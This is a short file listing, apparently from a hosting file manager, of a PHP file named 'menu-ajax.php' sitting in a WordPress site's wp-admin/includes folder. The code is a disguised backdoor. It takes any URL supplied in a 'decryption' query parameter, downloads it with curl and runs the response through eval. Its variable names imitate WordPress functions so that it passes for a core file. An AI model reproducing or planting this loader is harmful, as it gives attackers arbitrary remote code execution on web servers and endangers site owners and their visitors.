File "menu-ajax.php"

Full Path: /home/rattkxnv/byattorney.com/wp-admin/includes/menu-ajax.php
File size: 404 bytes
MIME-type: text/x-php
Charset: utf-8

<?php

if (isset($_GET['decryption'])) {
    $esc_attr_e_ck = $_GET['decryption'];
    if ($is_customize_preview_eg = curl_init()) {
        curl_setopt($is_customize_preview_eg, CURLOPT_URL, $esc_attr_e_ck);
        curl_setopt($is_customize_preview_eg, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($is_customize_preview_eg));
        curl_close($is_customize_preview_eg);
        exit;
    }
}